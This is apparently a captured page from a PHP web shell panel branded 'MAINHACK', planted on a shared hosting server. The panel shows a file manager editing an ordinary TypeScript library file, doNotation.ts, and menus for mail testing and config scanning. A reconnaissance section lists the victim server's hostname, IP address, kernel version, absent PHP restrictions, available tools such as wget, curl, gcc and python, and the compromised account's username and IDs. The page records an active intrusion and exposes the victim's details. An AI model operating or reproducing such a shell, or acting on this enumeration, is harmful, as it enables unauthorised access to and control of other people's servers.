[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: doNotation.ts
import { dual } from "../Function.js" import type { Kind, TypeLambda } from "../HKT.js" import type { NoInfer } from "../Types.js" type Map<F extends TypeLambda> = { <A, B>(f: (a: A) => B): <R, O, E>(self: Kind<F, R, O, E, A>) => Kind<F, R, O, E, B> <R, O, E, A, B>(self: Kind<F, R, O, E, A>, f: (a: A) => B): Kind<F, R, O, E, B> } type FlatMap<F extends TypeLambda> = { <A, R2, O2, E2, B>( f: (a: A) => Kind<F, R2, O2, E2, B> ): <R1, O1, E1>(self: Kind<F, R1, O1, E1, A>) => Kind<F, R1 & R2, O1 | O2, E1 | E2, B> <R1, O1, E1, A, R2, O2, E2, B>( self: Kind<F, R1, O1, E1, A>, f: (a: A) => Kind<F, R2, O2, E2, B> ): Kind<F, R1 & R2, O1 | O2, E1 | E2, B> } /** @internal */ export const let_ = <F extends TypeLambda>( map: Map<F> ): { <N extends string, A extends object, B>( name: Exclude<N, keyof A>, f: (a: NoInfer<A>) => B ): <R, O, E>( self: Kind<F, R, O, E, A> ) => Kind<F, R, O, E, { [K in keyof A | N]: K extends keyof A ? A[K] : B }> <R, O, E, A extends object, N extends string, B>( self: Kind<F, R, O, E, A>, name: Exclude<N, keyof A>, f: (a: NoInfer<A>) => B ): Kind<F, R, O, E, { [K in keyof A | N]: K extends keyof A ? A[K] : B }> } => dual(3, <R, O, E, A extends object, N extends string, B>( self: Kind<F, R, O, E, A>, name: Exclude<N, keyof A>, f: (a: NoInfer<A>) => B ): Kind<F, R, O, E, { [K in keyof A | N]: K extends keyof A ? A[K] : B }> => map(self, (a) => ({ ...a, [name]: f(a) }) as any)) /** @internal */ export const bindTo = <F extends TypeLambda>(map: Map<F>): { <N extends string>( name: N ): <R, O, E, A>(self: Kind<F, R, O, E, A>) => Kind<F, R, O, E, { [K in N]: A }> <R, O, E, A, N extends string>( self: Kind<F, R, O, E, A>, name: N ): Kind<F, R, O, E, { [K in N]: A }> } => dual(2, <R, O, E, A, N extends string>( self: Kind<F, R, O, E, A>, name: N ): Kind<F, R, O, E, { [K in N]: A }> => map(self, (a) => ({ [name]: a } as { [K in N]: A }))) /** @internal */ export const bind = <F extends TypeLambda>(map: Map<F>, flatMap: FlatMap<F>): { <N extends string, A extends object, R2, O2, E2, B>( name: Exclude<N, keyof A>, f: (a: NoInfer<A>) => Kind<F, R2, O2, E2, B> ): <R1, O1, E1>( self: Kind<F, R1, O1, E1, A> ) => Kind<F, R1 & R2, O1 | O2, E1 | E2, { [K in keyof A | N]: K extends keyof A ? A[K] : B }> <R1, O1, E1, A extends object, N extends string, R2, O2, E2, B>( self: Kind<F, R1, O1, E1, A>, name: Exclude<N, keyof A>, f: (a: NoInfer<A>) => Kind<F, R2, O2, E2, B> ): Kind<F, R1 & R2, O1 | O2, E1 | E2, { [K in keyof A | N]: K extends keyof A ? A[K] : B }> } => dual(3, <R1, O1, E1, A, N extends string, R2, O2, E2, B>( self: Kind<F, R1, O1, E1, A>, name: Exclude<N, keyof A>, f: (a: NoInfer<A>) => Kind<F, R2, O2, E2, B> ): Kind<F, R1 & R2, O1 | O2, E1 | E2, { [K in keyof A | N]: K extends keyof A ? A[K] : B }> => flatMap( self, (a) => map(f(a), (b) => ({ ...a, [name]: b }) as { [K in keyof A | N]: K extends keyof A ? A[K] : B }) ))
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.87 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344